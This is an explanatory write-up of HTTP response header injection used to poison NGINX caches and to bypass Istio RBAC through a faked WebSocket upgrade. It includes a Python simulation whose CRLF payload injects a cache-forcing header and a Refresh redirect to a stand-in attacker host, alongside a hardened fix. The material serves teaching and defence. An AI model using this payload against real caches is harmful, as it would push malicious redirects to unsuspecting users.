The first attack uses HTTP response header injection to poison an NGINX cache. On its own, a header injection in an application is normally only self-exploitable: the attacker can corrupt the response to their own request and nobody else's. When NGINX sits in front of the application with caching enabled, however, the injected headers can instruct NGINX to store the attacker-shaped response, after which the cached copy is served to other users who request the same resource, turning a self-only bug into a cross-user one.

The second attack bypasses path-based RBAC rules in Istio on Kubernetes. Envoy, the reverse proxy underpinning Istio, enforces those rules per HTTP request, but once it believes a connection has been successfully upgraded to a WebSocket it treats the connection as an opaque byte stream and forwards whatever follows to the upstream application server without further processing or RBAC validation. The same header-injection primitive is used to trick Envoy into believing the upgrade succeeded, after which the attacker can interact fully with the protected application as though Istio were not there.

The best mitigation is to evaluate the applications themselves and ensure they contain no HTTP response header injection vulnerabilities, since both attacks depend on that one primitive.
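As an added example (not code from the talk or from NGINX, Istio or Envoy), the following Python models the first attack end to end: a constructed upstream handler with a header-injection bug, a toy caching proxy, an attacker request that poisons the cache entry, and a clean victim request that receives the poisoned response. Everything beyond the page's description is an assumption made for illustration: the injection point is the Accept-Language request header reflected into Content-Language, chosen because it is an unkeyed input (not part of the cache key) so the victim's ordinary request maps to the attacker's entry; X-Accel-Expires is the header the attacker injects to force caching and Refresh is the injected header that harms the next visitor; and the proxy's freshness logic is a simplified model of nginx's documented proxy_cache rules, not nginx itself.

```python
import re
import time
from typing import Dict, List, Tuple

CRLF = "\r\n"


def app_response(accept_language: str, user: str) -> bytes:
    """Constructed vulnerable upstream handler (not real application code): it reflects
    the request's Accept-Language into Content-Language without rejecting CR/LF, which
    is the response header injection bug the attack needs."""
    body = f"profile of {user}"
    head = [
        "HTTP/1.1 200 OK",
        "Content-Type: text/plain",
        f"Content-Language: {accept_language}",
        f"Content-Length: {len(body)}",
    ]
    return (CRLF.join(head) + CRLF + CRLF + body).encode("latin-1")


def hardened_app_response(accept_language: str, user: str) -> bytes:
    """The fix the page recommends, applied in the application: refuse CR/LF in any
    value that is about to become a response header."""
    if re.search(r"[\r\n]", accept_language):
        raise ValueError("CR/LF in response header value")
    return app_response(accept_language, user)


def parse_response(raw: bytes) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Split a raw HTTP/1.1 response into status line, (name, value) header list and
    body, the way a proxy sees it once the injected CRLFs have taken effect."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def cache_ttl(headers: List[Tuple[str, str]]) -> int:
    """Simplified freshness decision, assumed for this example after nginx's documented
    proxy_cache rules: Set-Cookie disables caching, X-Accel-Expires takes priority over
    Cache-Control, otherwise max-age applies unless no-store/no-cache/private is set.
    Returns seconds to cache; 0 means do not cache."""
    by_name: Dict[str, List[str]] = {}
    for name, value in headers:
        by_name.setdefault(name, []).append(value)
    if "set-cookie" in by_name:
        return 0
    if "x-accel-expires" in by_name:
        value = by_name["x-accel-expires"][0]
        return int(value) if value.isdigit() else 0
    for cc in by_name.get("cache-control", []):
        if re.search(r"no-store|no-cache|private", cc):
            return 0
        m = re.search(r"max-age=(\d+)", cc)
        if m:
            return int(m.group(1))
    return 0


class CachingProxy:
    """Toy caching reverse proxy keyed on the request path only, so Accept-Language is
    an unkeyed input: the victim's plain request maps to the attacker's cache entry."""

    def __init__(self) -> None:
        self.store: Dict[str, Tuple[bytes, float]] = {}

    def get(self, path: str, accept_language: str, user: str) -> Tuple[bytes, bool]:
        entry = self.store.get(path)
        if entry is not None and entry[1] > time.time():
            return entry[0], True  # cache hit: the stored bytes go to whoever asked
        raw = app_response(accept_language, user)
        ttl = cache_ttl(parse_response(raw)[1])
        if ttl > 0:
            self.store[path] = (raw, time.time() + ttl)
        return raw, False


def poison_and_replay() -> Dict[str, object]:
    """Attacker request carrying the injection, then a clean victim request for the same path."""
    proxy = CachingProxy()
    # Constructed payload: a valid language tag followed by two injected headers.
    # X-Accel-Expires makes the proxy store the response; Refresh (honoured by browsers
    # like a meta refresh) is the part that hurts the next visitor.
    payload = "en\r\nX-Accel-Expires: 600\r\nRefresh: 0; url=https://attacker.example/"
    proxy.get("/profile", payload, user="attacker")
    victim_raw, hit = proxy.get("/profile", "de", user="victim")
    _, victim_headers, victim_body = parse_response(victim_raw)
    return {
        "served_from_cache": hit,
        "refresh_header": dict(victim_headers).get("refresh"),
        "body": victim_body.decode("latin-1"),
    }
```

Two things to check in a real deployment before concluding an injection is cross-user: which request inputs are part of the cache key (`proxy_cache_key` in nginx), because an injection point in the URL only reaches victims the attacker can lure to that URL, whereas an unkeyed header or cookie poisons the entry everyone shares; and which upstream headers the cache honours or ignores (`proxy_ignore_headers`), since that decides whether an injected freshness header can override the application's own Cache-Control.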